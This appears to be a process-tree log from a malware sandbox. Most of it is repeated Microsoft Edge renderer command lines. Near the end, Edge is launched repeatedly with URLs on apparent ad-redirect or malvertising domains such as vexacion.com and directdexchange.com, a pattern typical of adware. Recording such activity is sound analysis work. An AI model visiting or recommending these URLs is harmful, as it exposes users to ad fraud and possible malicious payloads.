"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12784 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=12660 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=135 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13000 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=140 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=141 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13052 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=143 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=144 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=145 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=146 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=147 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=148 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=149 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12464 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=150 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=151 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=152 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=153 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=154 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=155 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13600 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=156 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=157 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=158 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=159 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13780 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=160 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 11)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 12)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d24718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 11)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968011⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317811⤵
-
